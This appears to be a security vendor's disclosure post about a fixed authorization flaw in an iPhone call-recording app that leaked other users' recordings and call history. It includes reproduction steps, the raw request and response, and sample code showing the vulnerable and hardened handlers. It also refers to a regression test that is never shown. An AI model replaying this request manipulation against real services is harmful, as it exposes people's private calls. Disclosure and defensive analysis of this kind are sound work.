How we could have listened to anyone’s call recordings

The “Automatic call recorder” application is a popular application used by iPhone users to record their calls.

Written by Anand Prakash

November 15, 2022 | 2 min read

The vulnerability allowed any malicious actor to listen to any user’s call recordings: an unauthenticated API endpoint leaked the cloud storage URL of the victim’s data in the application’s storage bucket.

Disclaimer

This vulnerability was responsibly disclosed by Anand Prakash of PingSafe and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us through the entire disclosure process and getting this critical vulnerability fixed.

The app is among the top-grossing apps in the Business category of the App Store, currently #15 by downloads in the Business category worldwide.

Anand, with the help of PingSafe’s threat intelligence product, discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe decompiled the IPA file and identified the S3 buckets, host names, and other sensitive details used by the application.

Vulnerability Details

This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker can pass another user’s phone number in the recordings request, and the API responds with the recording URL in the storage bucket without any authentication. The response also leaks the victim’s entire call history and the numbers the calls were made to.

Steps to Reproduce

1) Install the “Automatic Call Recorder” application on your phone.

2) Intercept the application’s traffic in Burp Suite or ZAP Proxy.

3) You will observe a POST request to 167.88.123.157:80/fetch-sinch-recordings.php; change UserID to the victim’s phone number, including the country code.

4) The response will contain an S3 URL for the recording along with other sensitive details.

Vulnerable Request

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/JSON
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}

The Response

HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/JSON

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]
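The root cause described above is a missing authorization check: the endpoint trusts the UserID in the request body and hands back raw storage keys. The following is an added example (Python, not the application’s own PHP code) that reproduces that pattern beside a hardened variant in which identity is taken from a verified session, the client-supplied UserID is ignored, and downloads go through an ownership check that yields a short-lived signed URL. The recordings table, session store and HMAC signing secret are constructed placeholders standing in for the real database and S3 presigning.

```python
import hashlib
import hmac
import time

# Constructed sample rows shaped like the API response above; all values are placeholders.
RECORDINGS = [
    {"user_id": "+15550000001", "call_id": "c-1001", "callee": "+15550000002",
     "s3_key": "call_recordings/1011101/rec1.wav"},
    {"user_id": "+15550000002", "call_id": "c-2001", "callee": "+15550000001",
     "s3_key": "call_recordings/1011102/rec2.wav"},
]
# Constructed session store (assumption): bearer token -> authenticated user id.
SESSIONS = {"tok-alice": "+15550000001", "tok-bob": "+15550000002"}
SIGNING_SECRET = b"constructed-demo-secret"  # stand-in for a real presigning key


def fetch_recordings_vulnerable(body: dict) -> list:
    """Reproduces the bug: no authentication, the caller chooses any UserID,
    and raw storage keys are returned to the client."""
    return [r for r in RECORDINGS if r["user_id"] == body.get("UserID")]


def _session_user(headers: dict):
    auth = headers.get("Authorization", "")
    return SESSIONS.get(auth[7:]) if auth.startswith("Bearer ") else None


def fetch_recordings_fixed(headers: dict, body: dict) -> tuple:
    """Hardened: identity comes from the verified session, the client-supplied
    UserID in `body` is ignored, and storage keys never leave the server."""
    user_id = _session_user(headers)
    if user_id is None:
        return 401, {"error": "authentication required"}
    rows = [r for r in RECORDINGS if r["user_id"] == user_id]
    return 200, [{"call_id": r["call_id"], "callee": r["callee"]} for r in rows]


def download_fixed(headers: dict, call_id: str, now: int = 0) -> tuple:
    """Ownership check before issuing a short-lived signed download URL
    (an HMAC stand-in for an S3 presigned URL)."""
    user_id = _session_user(headers)
    if user_id is None:
        return 401, {"error": "authentication required"}
    rec = next((r for r in RECORDINGS if r["call_id"] == call_id), None)
    if rec is None or rec["user_id"] != user_id:
        return 404, {"error": "not found"}  # same answer for missing and foreign ids
    expires = (now or int(time.time())) + 300
    sig = hmac.new(SIGNING_SECRET, f"{rec['s3_key']}|{expires}".encode(),
                   hashlib.sha256).hexdigest()
    return 200, {"url": f"https://storage.example/{rec['s3_key']}?expires={expires}&sig={sig}"}
```

A regression test for this class of bug is the second call below: an authenticated user asking for another user’s number must get only their own rows, and never a storage key.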

Timelines

February 27th, 2021 09:20 PM IST

Vulnerability discovered by Anand Prakash from PingSafe

February 27th, 2021 10:34 PM IST

The company did not have a responsible disclosure program, so PingSafe reached out to Zack Whittaker for help with responsible disclosure. The issue was forwarded to the developer.

March 6th, 2021, 1:16 AM IST

Received confirmation from TechCrunch that the developer would publish a new build shortly.

March 6th, 2021, 08:52 PM IST

The bug was fixed, and a new version was made live on the App Store.

Security issues like this are catastrophic in nature. Beyond harming customer privacy, they also damage the company’s image and hand an advantage to competitors.

How PingSafe can Improve your Cloud Security

PingSafe uses the state-of-the-art intelligent risk evaluation engine to comprehensively monitor a company’s security health by assessing all domains, IPs, source codes, and leaked credentials.